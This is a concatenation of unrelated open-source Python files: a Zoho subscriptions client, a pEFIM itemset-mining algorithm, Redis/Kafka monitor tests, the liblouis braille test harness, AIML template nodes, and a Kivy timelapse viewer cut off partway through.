@dataclasses.dataclass
class LambdaAction(Action):
delegate: t.Callable[[ActionContext], None]
def execute(self, context: ActionContext) -> None:
self.delegate(context)
| 2.171875 | 2 |
zoho_subscriptions/subscriptions/plan.py | st8st8/django-zoho-subscriptions | 0 | 12799067 | <gh_stars>0
import ast
from requests import HTTPError
from zoho_subscriptions.client.client import Client
from zoho_subscriptions.subscriptions.addon import Addon
try:
from django.conf import settings as configuration
except ImportError:
try:
import config as configuration
except ImportError:
print("Zoho configurations not found in config/django settings, must be passed while initializing")
class Plan:
add_on_types = ['recurring', 'one_time', ]
def __init__(self, config=None):
if config is None:
self.client = Client(configuration.ZOHO_SUBSCRIPTION_CONFIG)
else:
self.client = Client(config)
def list_plans(self, filters=None, with_add_ons=True, add_on_type=None):
cache_key = 'plans'
response = self.client.get_from_cache(cache_key)
if response is None:
list_of_plan_uri = 'plans'
result = self.client.send_request("GET", list_of_plan_uri)
response = result['plans']
self.client.add_to_cache(cache_key, response)
if filters is not None:
for plan in response:
if (plan['name'] == filters['name'] or plan['plan_code'] == filters['plan_code']):
return plan
# if with_add_ons is not None:
# if with_add_ons in add_on_type:
# return None
else:
print("Returning from cache : " + cache_key)
return response
def get_plan(self, plan_code):
cache_key = 'plan_%s' % plan_code
response = self.client.get_from_cache(cache_key)
if response is None:
plan_by_plan_code = 'plans/%s' % plan_code
result = self.client.send_request("GET", plan_by_plan_code)
if type(result) is HTTPError:
result_bytes = result.response._content
result_dict = ast.literal_eval(result_bytes.decode('utf-8'))
return result_dict['message']
else:
response = result['plan']
self.client.add_to_cache(cache_key, response)
else:
print("Returning from cache : " + cache_key)
return response
def get_addons_for_plan(self,plan_code):
cache_key = 'plans'
addon_code_list = []
addon = Addon()
response = self.client.get_from_cache(cache_key)
if response is None:
list_of_plan_uri = 'plans'
result = self.client.send_request("GET", list_of_plan_uri)
response = result['plans']
self.client.add_to_cache(cache_key, response)
if plan_code is not None:
for each_plan in response:
if each_plan.get("addons"):
if each_plan.get('plan_code')== plan_code:
for each_addon_code in each_plan["addons"]:
addon_code_list.append(addon.get_addon(each_addon_code['addon_code']))
return addon_code_list
else:
print("Returning from cache : " + cache_key)
# Filter Plan
def get_price_by_plan_code(self, plan_code):
cache_key = 'plan_%s' % plan_code
response = self.client.get_from_cache(cache_key)
if response is None:
plan_by_plan_code = 'plans/%s' % plan_code
result = self.client.send_request("GET", plan_by_plan_code)
if type(result) is HTTPError:
result_bytes = result.response._content
result_dict = ast.literal_eval(result_bytes.decode('utf-8'))
return result_dict['message']
else:
response = result['plan']
self.client.add_to_cache(cache_key, response)
recurring_price = response['recurring_price']
return recurring_price
else:
print("Returning from cache : " + cache_key)
return response
| 2.1875 | 2 |
upcycle/cuda/__init__.py | samuelstanton/upcycle | 0 | 12799068 | from .try_cuda import try_cuda | 1.007813 | 1 |
socialposts/settings/__init__.py | renanbs/socialposts | 0 | 12799069 | from .production import *
try:
    from .local import *
except:
pass
| 1.109375 | 1 |
pEFIM.py | pradeepppc/PSHUIM | 0 | 12799070 | from functools import cmp_to_key
from Transaction import Transaction
class pEFIM():
highUtilityItemsets = []
candidateCount = 0
utilityBinArrayLU = {}
utilityBinArraySU = {}
# a temporary buffer
temp = []
for i in range(5000):
temp.append(0)
def __init__(self, mapItemsToneighbors, minUtility, itemsToExplore, itemsToKeep, transactions, newNamesToOldNames, oldNamesToNewNames):
self.minUtil = minUtility
self.Neighbours = mapItemsToneighbors
self.itemsToExplore = itemsToExplore
self.itemsToKeep = itemsToKeep
self.transactions = transactions
self.newNamesToOldNames = newNamesToOldNames
self.oldNamesToNewNames = oldNamesToNewNames
def runAlgo(self):
        # now we will sort the transactions according to the proposed total order on transactions
self.sortDatabase(self.transactions)
self.backtrackingEFIM(self.transactions, self.itemsToKeep, self.itemsToExplore, 0)
return (1, self.highUtilityItemsets)
def backtrackingEFIM(self, transactionsOfP, itemsToKeep, itemsToExplore, prefixLength):
self.candidateCount += len(itemsToExplore)
for idx, e in enumerate(itemsToExplore):
            # calculate the transactions containing p U {e}
# at the same time project transactions to keep what appears after e
transactionsPe = []
            # variable to calculate the utility of Pe
utilityPe = 0
# merging transactions
previousTransaction = transactionsOfP[0]
consecutiveMergeCount = 0
for transaction in transactionsOfP:
items = transaction.getItems()
if e in items:
# if e was found in the transaction
positionE = items.index(e)
if transaction.getLastPosition() == positionE:
utilityPe += transaction.getUtilities()[positionE] + transaction.prefixUtility
else:
projectedTransaction = transaction.projectTransaction(positionE)
utilityPe += projectedTransaction.prefixUtility
if previousTransaction == transactionsOfP[0]:
                            # if it is the first transaction
previousTransaction = projectedTransaction
elif self.is_equal(projectedTransaction, previousTransaction):
if consecutiveMergeCount == 0:
# if the first consecutive merge
items = previousTransaction.items[previousTransaction.offset:]
utilities = previousTransaction.utilities[previousTransaction.offset:]
itemsCount = len(items)
positionPrevious = 0
positionProjection = projectedTransaction.offset
while positionPrevious < itemsCount:
utilities[positionPrevious] += projectedTransaction.utilities[positionProjection]
positionPrevious += 1
positionProjection += 1
previousTransaction.prefixUtility += projectedTransaction.prefixUtility
sumUtilities = previousTransaction.prefixUtility
previousTransaction = Transaction(items, utilities, previousTransaction.transactionUtility + projectedTransaction.transactionUtility)
previousTransaction.prefixUtility = sumUtilities
else:
positionPrevious = 0
positionProjected = projectedTransaction.offset
itemsCount = len(previousTransaction.items)
while positionPrevious < itemsCount:
previousTransaction.utilities[positionPrevious] += projectedTransaction.utilities[
positionProjected]
positionPrevious += 1
positionProjected += 1
previousTransaction.transactionUtility += projectedTransaction.transactionUtility
previousTransaction.prefixUtility += projectedTransaction.prefixUtility
consecutiveMergeCount += 1
else:
transactionsPe.append(previousTransaction)
previousTransaction = projectedTransaction
consecutiveMergeCount = 0
transaction.offset = positionE
if previousTransaction != transactionsOfP[0]:
transactionsPe.append(previousTransaction)
self.temp[prefixLength] = self.newNamesToOldNames[e]
if utilityPe >= self.minUtil:
self.highUtilityItemsets.append((utilityPe , self.temp[:prefixLength + 1]))
            # calculate the set which is the intersection of all the neighbours of items present in P U {e}
neighbourhoodList = self.caluclateNeighbourIntersection(prefixLength)
            # calculate the local utility and subtree utility
self.useUtilityBinArraysToCalculateUpperBounds(transactionsPe, idx, itemsToKeep, neighbourhoodList)
newItemsToKeep = []
newItemsToExplore = []
for l in range(idx + 1, len(itemsToKeep)):
itemk = itemsToKeep[l]
if self.utilityBinArraySU[itemk] >= self.minUtil:
if itemk in neighbourhoodList:
newItemsToExplore.append(itemk)
newItemsToKeep.append(itemk)
elif self.utilityBinArrayLU[itemk] >= self.minUtil:
if itemk in neighbourhoodList:
newItemsToKeep.append(itemk)
self.backtrackingEFIM(transactionsPe, newItemsToKeep, newItemsToExplore, prefixLength + 1)
def intersection(self, lst1, lst2):
# Use of hybrid method
temp = set(lst2)
lst3 = [value for value in lst1 if value in temp]
return lst3
def caluclateNeighbourIntersection(self, prefixLength):
intersectionList = []
if self.temp[0] in self.Neighbours:
intersectionList = self.Neighbours[self.temp[0]]
else:
return intersectionList
for i in range(1, prefixLength+1):
if self.temp[i] in self.Neighbours:
intersectionList = self.intersection(self.Neighbours[self.temp[i]], intersectionList)
finalIntersectionList = []
for item in intersectionList:
if item in self.oldNamesToNewNames:
finalIntersectionList.append(self.oldNamesToNewNames[item])
return finalIntersectionList
def useUtilityBinArraysToCalculateUpperBounds(self, transactionsPe, j, itemsToKeep, neighbourhoodList):
for i in range(j + 1, len(itemsToKeep)):
item = itemsToKeep[i]
self.utilityBinArrayLU[item] = 0
self.utilityBinArraySU[item] = 0
for transaction in transactionsPe:
length = len(transaction.getItems())
i = length - 1
while i >= transaction.offset:
item = transaction.getItems()[i]
if item in itemsToKeep:
remainingUtility = 0
if self.newNamesToOldNames[item] in self.Neighbours:
item_neighbours = self.Neighbours[self.newNamesToOldNames[item]]
for k in range(i, length):
transaction_item = transaction.getItems()[k]
if self.newNamesToOldNames[transaction_item] in item_neighbours and transaction_item in neighbourhoodList:
remainingUtility += transaction.getUtilities()[k]
remainingUtility += transaction.getUtilities()[i]
self.utilityBinArraySU[item] += remainingUtility + transaction.prefixUtility
self.utilityBinArrayLU[item] += transaction.transactionUtility + transaction.prefixUtility
i -= 1
def is_equal(self, transaction1, transaction2):
length1 = len(transaction1.items) - transaction1.offset
length2 = len(transaction2.items) - transaction2.offset
if length1 != length2:
return False
position1 = transaction1.offset
position2 = transaction2.offset
while position1 < len(transaction1.items):
if transaction1.items[position1] != transaction2.items[position2]:
return False
position1 += 1
position2 += 1
return True
def sortDatabase(self, transactions):
cmp_items = cmp_to_key(self.sort_transaction)
transactions.sort(key=cmp_items)
def sort_transaction(self, trans1, trans2):
trans1_items = trans1.getItems()
trans2_items = trans2.getItems()
pos1 = len(trans1_items) - 1
pos2 = len(trans2_items) - 1
if len(trans1_items) < len(trans2_items):
while pos1 >= 0:
sub = trans2_items[pos2] - trans1_items[pos1]
if sub != 0:
return sub
pos1 -= 1
pos2 -= 1
return -1
elif len(trans1_items) > len(trans2_items):
while pos2 >= 0:
sub = trans2_items[pos2] - trans1_items[pos1]
if sub != 0:
return sub
pos1 -= 1
pos2 -= 1
return 1
else:
while pos2 >= 0:
sub = trans2_items[pos2] - trans1_items[pos1]
if sub != 0:
return sub
pos1 -= 1
pos2 -= 1
return 0
| 2.703125 | 3 |
src/eddington/__init__.py | AssafZohar/eddington | 0 | 12799071 | """Core functionalities of the Eddington platform."""
from eddington.exceptions import (
EddingtonException,
FitDataColumnExistenceError,
FitDataColumnIndexError,
FitDataColumnsLengthError,
FitDataError,
FitDataInvalidFile,
FitDataInvalidFileSyntax,
FitFunctionLoadError,
FitFunctionRuntimeError,
)
from eddington.fit_data import FitData
from eddington.fit_function_class import FitFunction, fit_function
from eddington.fit_functions_registry import FitFunctionsRegistry
from eddington.fit_result import FitResult
from eddington.fit_functions_list import (
constant,
exponential,
hyperbolic,
linear,
parabolic,
polynom,
cos,
sin,
straight_power,
inverse_power,
)
from eddington.fitting import fit_to_data
__all__ = [
# Fit functions infrastructure
"FitFunction",
"fit_function",
"FitFunctionsRegistry",
# Fit functions
"constant",
"exponential",
"hyperbolic",
"linear",
"parabolic",
"polynom",
"cos",
"sin",
"straight_power",
"inverse_power",
# Fitting algorithm
"fit_to_data",
# Exceptions
"EddingtonException",
"FitFunctionRuntimeError",
"FitFunctionLoadError",
"FitDataError",
"FitDataColumnExistenceError",
"FitDataColumnIndexError",
"FitDataInvalidFile",
"FitDataColumnsLengthError",
"FitDataInvalidFileSyntax",
# Data structures
"FitData",
"FitResult",
]
| 2.015625 | 2 |
redis-monitor/tests/tests_online.py | abael/ScrapyCluster | 0 | 12799072 | <reponame>abael/ScrapyCluster<gh_stars>0
'''
Online integration tests
'''
import unittest
from unittest import TestCase
from mock import MagicMock
import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
from redis_monitor import RedisMonitor
from plugins.kafka_base_monitor import KafkaBaseMonitor
from kafka import KafkaClient, SimpleConsumer
import settings
import redis
import json
class CustomMonitor(KafkaBaseMonitor):
'''
Custom Monitor so we can run this test live without interference
'''
regex = "info-test:*"
def setup(self, settings):
KafkaBaseMonitor.setup(self, settings)
def handle(self, key, value):
return_dict = {
"info-test": value,
"appid": "someapp"
}
self._send_to_kafka(return_dict)
self.redis_conn.delete(key)
class TestRedisMonitor(TestCase):
maxDiff = None
queue_key = "link:istresearch.com:queue"
def setUp(self):
self.redis_monitor = RedisMonitor("localsettings.py")
self.redis_monitor.settings = self.redis_monitor.wrapper.load("localsettings.py")
self.redis_monitor.logger = MagicMock()
self.redis_monitor.settings['KAFKA_TOPIC_PREFIX'] = "demo_test"
self.redis_monitor.settings['STATS_TOTAL'] = False
self.redis_monitor.settings['STATS_PLUGINS'] = False
self.redis_monitor.settings['PLUGINS'] = {
'plugins.info_monitor.InfoMonitor': None,
'plugins.stop_monitor.StopMonitor': None,
'plugins.expire_monitor.ExpireMonitor': None,
'tests.tests_online.CustomMonitor': 100,
}
self.redis_monitor.redis_conn = redis.Redis(
host=self.redis_monitor.settings['REDIS_HOST'],
port=self.redis_monitor.settings['REDIS_PORT'])
self.redis_monitor._load_plugins()
self.redis_monitor.stats_dict = {}
self.kafka_conn = KafkaClient(self.redis_monitor.settings[
'KAFKA_HOSTS'])
self.kafka_conn.ensure_topic_exists("demo_test.outbound_firehose")
self.consumer = SimpleConsumer(
self.kafka_conn,
"demo-id",
"demo_test.outbound_firehose"
)
def test_process_item(self):
# we only want to go to the end now, not after this test is ran
self.consumer.seek(0, 2)
# set the info flag
key = "info-test:blah"
value = "ABC123"
self.redis_monitor.redis_conn.set(key, value)
# process the request
plugin = self.redis_monitor.plugins_dict.items()[0][1]
self.redis_monitor._process_plugin(plugin)
# ensure the key is gone
self.assertEquals(self.redis_monitor.redis_conn.get(key), None)
def test_sent_to_kafka(self):
success = {
u'info-test': "ABC123",
u"appid": u"someapp"
}
# ensure it was sent out to kafka
message_count = 0
for message in self.consumer.get_messages():
if message is None:
break
else:
the_dict = json.loads(message.message.value)
self.assertEquals(success, the_dict)
message_count += 1
self.assertEquals(message_count, 1)
if __name__ == '__main__':
unittest.main()
| 1.921875 | 2 |
third_party/liblouis/src/tests/harness/runHarness.py | zipated/src | 2,151 | 12799073 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Liblouis test harness
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., Franklin Street, Fifth Floor,
# Boston MA 02110-1301 USA.
#
# Copyright (c) 2012, liblouis team, <NAME>.
"""Liblouis test harness:
Please see the liblouis documentation for information on how to add a new harness or more tests for your braille table.
@author: <NAME> <<EMAIL>>
@author: <NAME> <<EMAIL>>
@author: <NAME> <<EMAIL>>
"""
import json
import os
import sys
import traceback
from glob import iglob
from louis import translate, backTranslateString, hyphenate
from louis import noContractions, compbrlAtCursor, dotsIO, comp8Dots, pass1Only, compbrlLeftCursor, otherTrans, ucBrl
try:
from nose.plugins import Plugin
from nose import run
except ImportError:
sys.stderr.write("The harness tests require nose. Skipping...\n")
sys.exit(0)
### Nosetest plugin for controlling the output format. ###
class Reporter(Plugin):
name = 'reporter'
def __init__(self):
super(Reporter, self).__init__()
self.res = []
self.stream = None
def setOutputStream(self, stream):
# grab for own use
self.stream = stream
# return dummy stream
class dummy:
def write(self, *arg):
pass
def writeln(self, *arg):
pass
def flush(self):
pass
d = dummy()
return d
def addError(self, test, err):
exctype, value, tb = err
errMsg = ''.join(traceback.format_exception(exctype, value, tb))
self.res.append("--- Error: ---\n%s\n--- end ---\n" % errMsg)
def addFailure(self, test, err):
exctype, value, tb = err
#errMsg = ''.join(traceback.format_exception(exctype, value, None))
self.res.append("%s\n" % value)
def finalize(self, result):
failures=len(result.failures)
errors=len(result.errors)
total=result.testsRun
percent_string = " ({percent}% success)".format(percent=round((total-failures-errors+0.0)/total*100,2)) if total > 0 else ""
self.res.append("Ran {total} tests{percent_string}, with {failures} failures and {errors} errors.\n".format(total=total, percent_string=percent_string, failures=failures, errors=errors))
self.stream.write("\n".join(self.res))
### End of nosetest plugin for controlling the output format. ###
PY2 = sys.version_info[0] == 2
def u(a):
if PY2:
return a.encode("utf-8")
return a
modes = {
'noContractions': noContractions,
'compbrlAtCursor': compbrlAtCursor,
'dotsIO': dotsIO,
'comp8Dots': comp8Dots,
'pass1Only': pass1Only,
'compbrlLeftCursor': compbrlLeftCursor,
'otherTrans': otherTrans,
'ucBrl': ucBrl
}
def showCurPos(length, pos1, marker1="^", pos2=None, marker2="*"):
"""A helper function to make a string to show the position of the given cursor."""
display = [" "] *length
display[pos1] = marker1
if pos2:
display[pos2] = marker2
return "".join(display)
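# Tiny usage check for showCurPos (added illustration; not part of the original harness):
# the returned string is as long as the braille text, with '^' under the cursor and an
# optional second marker.
assert showCurPos(7, 2) == "  ^    "
assert showCurPos(7, 2, pos2=5) == "  ^  * "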
class BrailleTest():
def __init__(self, harnessName, tables, input, output, outputUniBrl=False, mode=0, cursorPos=None, brlCursorPos=None, testmode='translate', comment=[]):
self.harnessName = harnessName
self.tables = tables
if outputUniBrl:
self.tables.insert(0, 'unicode.dis')
self.input = input
self.expectedOutput = output
self.mode = mode if not mode else modes[mode]
self.cursorPos = cursorPos
self.expectedBrlCursorPos = brlCursorPos
self.comment = comment
self.testmode = testmode
def __str__(self):
return "%s" % self.harnessName
def hyphenateword(self, tables, word, mode):
# FIXME: liblouis currently crashes if we dont add space at end of the word, probably due to a counter running past the end of the string.
# medium/longterm this hack should be removed, and the root of the problem found/resolved.
hyphen_mask=hyphenate(tables, word+' ', mode)
        # FIXME: why do we need to remove the last item on Python 2, while on Python 3 it is not needed?
        # i.e. on Python 2, word and hyphen_mask are not of the same length.
if PY2:
return "".join( map(lambda a,b: "-"+a if b=='1' else a, word, hyphen_mask)[:-1] )
else:
return "".join( list(map(lambda a,b: "-"+a if b=='1' else a, word, hyphen_mask)) )
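    # Illustration of the mask handling above (added comment, not original code): hyphenate()
    # yields one '0'/'1' flag per character, where '1' means "a hyphen may go before this
    # character", so the word "table" with mask "00100" becomes "ta-ble".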
def check_translate(self):
if self.cursorPos is not None:
tBrl, temp1, temp2, tBrlCurPos = translate(self.tables, self.input, mode=self.mode, cursorPos=self.cursorPos)
else:
tBrl, temp1, temp2, tBrlCurPos = translate(self.tables, self.input, mode=self.mode)
template = "%-25s '%s'"
tBrlCurPosStr = showCurPos(len(tBrl), tBrlCurPos)
report = [
"--- Braille Difference Failure: %s ---" % self.__str__(),
template % ("comment:", "".join(self.comment)),
template % ("input:", self.input),
template % ("expected brl:", self.expectedOutput),
template % ("actual brl:", tBrl),
"--- end ---",
]
assert tBrl == self.expectedOutput, u("\n".join(report))
def check_backtranslate(self):
backtranslate_output = backTranslateString(self.tables, self.input, None, mode=self.mode)
template = "%-25s '%s'"
report = [
"--- Backtranslate failure: %s ---" % self.__str__(),
template % ("comment:", "".join(self.comment)),
template % ("input:", self.input),
template % ("expected text:", self.expectedOutput),
template % ("actual backtranslated text:", backtranslate_output),
"--- end ---",
]
assert backtranslate_output == self.expectedOutput, u("\n".join(report))
def check_cursor(self):
tBrl, temp1, temp2, tBrlCurPos = translate(self.tables, self.input, mode=self.mode, cursorPos=self.cursorPos)
template = "%-25s '%s'"
etBrlCurPosStr = showCurPos(len(tBrl), tBrlCurPos, pos2=self.expectedBrlCursorPos)
report = [
"--- Braille Cursor Difference Failure: %s ---" %self.__str__(),
template % ("comment:", "".join(self.comment)),
template % ("input:", self.input),
template % ("received brl:", tBrl),
template % ("BRLCursorAt %d expected %d:" %(tBrlCurPos, self.expectedBrlCursorPos),
etBrlCurPosStr),
"--- end ---"
]
assert tBrlCurPos == self.expectedBrlCursorPos, u("\n".join(report))
def check_hyphenate(self):
hyphenated_word = self.hyphenateword(self.tables, self.input, mode=self.mode)
template = "%-25s '%s'"
report = [
"--- Hyphenation failure: %s ---" % self.__str__(),
template % ("input:", self.input),
template % ("expected hyphenated word:", self.expectedOutput),
template % ("actual hyphenated word:", hyphenated_word),
"--- end ---",
]
assert hyphenated_word == self.expectedOutput, u("\n".join(report))
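# A rough sketch of what a *_harness.txt file is assumed to contain, based on how
# test_allCases() below reads it; the table name and braille output here are
# hypothetical placeholders, not verified liblouis data:
#
#   {
#       "tables": ["en-ueb-g2.ctb"],
#       "tests": [
#           {"flags": {"testmode": "translate"},
#            "data": [{"input": "hello", "output": "⠓⠑⠇⠇⠕", "comment": ["example"]}]}
#       ]
#   }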
def test_allCases():
if 'HARNESS_DIR' in os.environ:
# we assume that if HARNESS_DIR is set that we are invoked from
# the Makefile, i.e. all the paths to the Python test files and
# the test tables are set correctly.
harness_dir = os.environ['HARNESS_DIR']
else:
# we are not invoked via the Makefile, i.e. we have to set up the
# paths (LOUIS_TABLEPATH) manually.
harness_dir = "."
# make sure local test braille tables are found
os.environ['LOUIS_TABLEPATH'] = '../tables,../../tables'
testfiles=[]
if len(sys.argv)>1:
# grab the test files from the arguments
for test_file in sys.argv[1:]:
testfiles.extend(iglob(os.path.join(harness_dir, test_file)))
else:
# Process all *_harness.txt files in the harness directory.
testfiles=iglob(os.path.join(harness_dir, '*_harness.txt'))
for harness in testfiles:
f = open(harness, 'r')
try:
harnessModule = json.load(f, encoding="UTF-8")
except ValueError as e:
raise ValueError("%s doesn't look like a harness file, %s" %(harness, e.message))
f.close()
tableList = []
if isinstance(harnessModule['tables'], list):
tableList.extend(harnessModule['tables'])
else:
tableList.append(harnessModule['tables'])
origflags = {'testmode':'translate'}
for section in harnessModule['tests']:
flags = origflags.copy()
flags.update(section.get('flags', {}))
for testData in section['data']:
test = flags.copy()
testTables = tableList[:]
test.update(testData)
bt = BrailleTest(harness, testTables, **test)
if test['testmode'] == 'translate':
yield bt.check_translate
if 'cursorPos' in test:
yield bt.check_cursor
if test['testmode'] == 'backtranslate':
yield bt.check_backtranslate
if test['testmode'] == 'hyphenate':
yield bt.check_hyphenate
if __name__ == '__main__':
result = run(addplugins=[Reporter()], argv=['-v', '--with-reporter', sys.argv[0]], defaultTest=__name__)
# FIXME: Ideally the harness tests should return the result of the
# tests. However since there is no way to mark a test as expected
# failure ATM we would have to disable a whole file of tests. So,
# for this release we will pretend all tests succeeded and will
# add a @expected_test feature for the next release. See also
# http://stackoverflow.com/questions/9613932/nose-plugin-for-expected-failures
result = True
sys.exit(0 if result else 1)
| 1.5625 | 2 |
parlai/agents/programr/parser/template/nodes/base.py | roholazandie/ParlAI | 0 | 12799074 | <filename>parlai/agents/programr/parser/template/nodes/base.py
import xml.etree.ElementTree as ET
# from parlai.agents.programr.utils.logging.ylogger import YLogger
import parlai.utils.logging as logging
from parlai.agents.programr.aiml_manager import AIMLManager
aiml_manager = AIMLManager.get_instance()
######################################################################################################################
#
class TemplateNode(object):
def __init__(self):
self._children = []
@property
def children(self):
return self._children
def append(self, child):
self._children.append(child)
def dump(self, tabs, output_func, eol, verbose):
self.output(tabs, output_func, eol, verbose)
def output(self, tabs, output_func, eol, verbose):
self.output_child(self, tabs, eol, output_func)
def output_child(self, node, tabs, eol, output_func):
for child in node.children:
output_func(self, "{0}{1}{2}".format(tabs, child.to_string(), eol))
self.output_child(child, tabs + "\t", eol, output_func)
def resolve_children_to_string(self, brain):
words = [child.resolve(brain) for child in self._children]
return aiml_manager.nlp.tokenizer.words_to_texts(words)
def resolve(self, brain):
try:
resolved = self.resolve_children_to_string(brain)
# YLogger.debug(brain, "[%s] resolved to [%s]", self.to_string(), resolved)
logging.debug(f"{self.to_string()} resolved to {resolved}")
return resolved
except Exception as excep:
# YLogger.exception(brain, "Failed to resolve", excep)
logging.error(f"Failed to resolve {excep}")
return ""
def to_string(self):
return "[NODE]"
def to_xml(self, brain):
return self.children_to_xml(brain)
def xml_tree(self, brain):
xml = "<template>"
xml += self.children_to_xml(brain)
xml += "</template>"
return ET.fromstring(xml)
def children_to_xml(self, brain):
xml = ""
first = True
for child in self.children:
if first is not True:
xml += " "
first = False
xml += child.to_xml(brain)
return xml
def parse_text(self, graph, text):
if text is not None:
string = text.strip()
if string:
words = graph.aiml_parser.brain.nlp.tokenizer.texts_to_words(string)
for word in words:
if word is not None and word:
word_class = graph.get_node_class_by_name('word')
word_node = word_class(word.strip())
self.children.append(word_node)
return True
return False
def get_text_from_element(self, element):
text = element.text
if text is not None:
text = text.strip()
return text
return None
def get_tail_from_element(self, element):
text = element.tail
if text is not None:
text = text.strip()
if text == "":
return None
return text
return None
def parse_template_node(self, graph, pattern):
head_text = self.get_text_from_element(pattern)
head_result = self.parse_text(graph, head_text)
found_sub = False
for sub_pattern in pattern:
graph.parse_tag_expression(sub_pattern, self)
tail_text = self.get_tail_from_element(sub_pattern)
self.parse_text(graph, tail_text)
found_sub = True
if head_result is False and found_sub is False:
if hasattr(pattern, '_end_line_number'):
# YLogger.warning(self, "No context in template tag at [line(%d), column(%d)]",
# pattern._end_line_number,
# pattern._end_column_number)
logging.warning(f"No context in template tag at [line({pattern._end_line_number}), column({pattern._end_line_number})]")
else:
# YLogger.warning(self, "No context in template tag")
logging.warning("No context in template tag")
#######################################################################################################
def add_default_star(self):
return False
def _parse_node(self, graph, expression):
expression_text = self.parse_text(graph, self.get_text_from_element(expression))
expression_children = False
for child in expression:
graph.parse_tag_expression(child, self)
self.parse_text(graph, self.get_tail_from_element(child))
expression_children = True
if expression_text is False and expression_children is False:
if self.add_default_star():
# YLogger.debug(self, "Node has no content (text or children), default to <star/>")
logging.debug("Node has no content (text or children), default to <star/>")
star_class = graph.get_node_class_by_name('star')
star_node = star_class()
self.append(star_node)
#######################################################################################################
def parse_attrib_value_as_word_node(self, graph, expression, attrib_name):
node = graph.get_base_node()
name_node = graph.get_word_node(expression.attrib[attrib_name])
node.append(name_node)
return node
def parse_children_as_word_node(self, graph, child):
node = graph.get_base_node()
node.parse_text(graph, self.get_text_from_element(child))
for sub_child in child:
graph.parse_tag_expression(sub_child, node)
            node.parse_text(graph, self.get_tail_from_element(sub_child))
return node
def parse_expression(self, graph, expression):
raise NotImplementedError("Never call this directly, call the subclass instead!")
| 2.28125 | 2 |
Viewer/Viewer.py | FWMSH/timelapseViewer | 0 | 12799075 | '''
File: Viewer.py
Author: <NAME>. & <NAME>.
Date: 06/04/19
Description: This viewer can be run on a RaspberryPI, and pulls timelapse photos from a webserver hosted by Server.py
'''
from kivy.config import Config
import timelapseshare as tls
import PIL
import _thread
import time
import os
os.environ['KIVY_GL_BACKEND'] = 'gl' # FIXES A SEGFAULT ????
import urllib.request as urllib
#Config.set('graphics', 'fullscreen','auto')
Config.set('input', 'mouse', 'mouse,multitouch_on_demand')
#Config.set('kivy', 'exit_on_escape', '1')
from kivy.app import App
from kivy.core.window import Window
from kivy.uix.screenmanager import ScreenManager, Screen, NoTransition
from kivy.uix.label import Label
from kivy.uix.image import Image
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.gridlayout import GridLayout
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.button import Button
from kivy.graphics import Rectangle, Color
from kivy.clock import Clock
# ==========================
# Defaults
# ==========================
_SPEED = 1
_UPDATE_INTERVAL = 10 # every 10 seconds
_CLEAR_CACHE = False
_FILESERVER = "http://localhost:8000"
# ==========================
# Command-Line Arguments
# ==========================
import argparse
import platform
def dir_path(string):
if os.path.isdir(string):
return string
else:
        raise argparse.ArgumentTypeError("not a valid directory: " + string)
parser = argparse.ArgumentParser(description="Interactive Timelapse scroller")
parser.add_argument("-i", "--image_directory", type=dir_path, help="Sets the directory where the images are stored")
parser.add_argument("-pre", "--image_prefix", type=str, help="Sets the prefix of the image Eg. 'IMG'")
parser.add_argument("-post", "--image_postfix", type=str, help="Sets the postfix of the image Eg. '.jpg'")
parser.add_argument("-url", "--server_url", type=str, help="Sets the link to the server hosted by the webcam")
args = parser.parse_args()
if args.image_directory:
print("[*] SETTING IMAGE DIRECTORY : " + args.image_directory)
tls.setImageDirectory(args.image_directory)
if args.server_url:
print("[*] SETTING URL TO SERVER : " + args.server_url)
_FILESERVER = args.server_url
# ==========================
# Runtime Calculations
# ==========================
tls.updateStats()
def getImageDateTime(ID):
	# read the timestamp text stored alongside the image with the given ID
	datafile = open(tls.getDataByID(ID))
	contents = datafile.read()
	datafile.close()
	return contents
print("Highest: %d\nLowest: %d" % (tls.getMax(), tls.getMin()))
# ==========================
# WebServer stuff
# ==========================
def update_imgs(min_i, max_i):
global _CLEAR_CACHE
if tls._MIN > min_i and _CLEAR_CACHE:
for i in range(tls._MIN, min_i): # delete files in that range
try:
print("removing " + str(i))
os.remove(tls.getImageByID(i))
except:
print(str(i) + " doesn't exist!")
if tls._MAX < max_i:
for i in range(tls._MAX, max_i): # gets files in that range
try:
print("retrieving " + str(i))
urllib.urlretrieve(_FILESERVER + "/frame" + str(i) + ".jpg", tls.getImageByID(i))
except:
print(str(i) + " doesn't exist!")
tls.updateStatsManually(min_i, max_i)
def get_update():
try:
urllib.urlretrieve(_FILESERVER + "/index.txt", "index.txt")
indx = open("index.txt")
lines = indx.readlines()
mi = int(lines[0])
ma = int(lines[1])
update_imgs(mi, ma)
return True
except:
print("server down!")
return False
# ==========================
# Update thread
# ==========================
get_update()
def update_loop():
global _UPDATE_INTERVAL
while True:
time.sleep(_UPDATE_INTERVAL)
get_update()
_thread.start_new_thread(update_loop, ())
# ==========================
# User-Interface
# ==========================
class DebugScreen(Screen):
def __init__(self, *args, **kwargs):
super(DebugScreen, self).__init__(*args, **kwargs)
self.index = tls._MIN
master_layout = BoxLayout(orientation='vertical', size_hint=(1, 0.1))
self.title = Label(text='', font_size=80, size_hint=(1, 1))
master_layout.add_widget(self.title)
background_container = FloatLayout()
self.image = Image(source=tls.getImageByID(self.index), size_hint=(1, 0.9), nocache=True, allow_stretch=True)
background_container.add_widget(self.image)
background_container.add_widget(master_layout)
self.add_widget(background_container)
Clock.schedule_interval(self.updateScroll, 0.10)
Clock.schedule_interval(self.TLS_update, 1)
# Keyboard Input
self._keyboard = Window.request_keyboard(self._keyboard_closed, self)
self._keyboard.bind(on_key_down=self._on_keyboard_down, on_key_up=self._on_keyboard_up)
self.leftKey = False
self.rightKey = False
self.leftCount = 0
self.rightCount = 0
self.velo = 0
# Keyboard callbacks
def _keyboard_closed(self):
self._keyboard.unbind(on_key_down=self._on_keyboard_down)
self._keyboard = None
def _on_keyboard_down(self, keyboard, keycode, text, modifiers):
if keycode[1] == 'left':
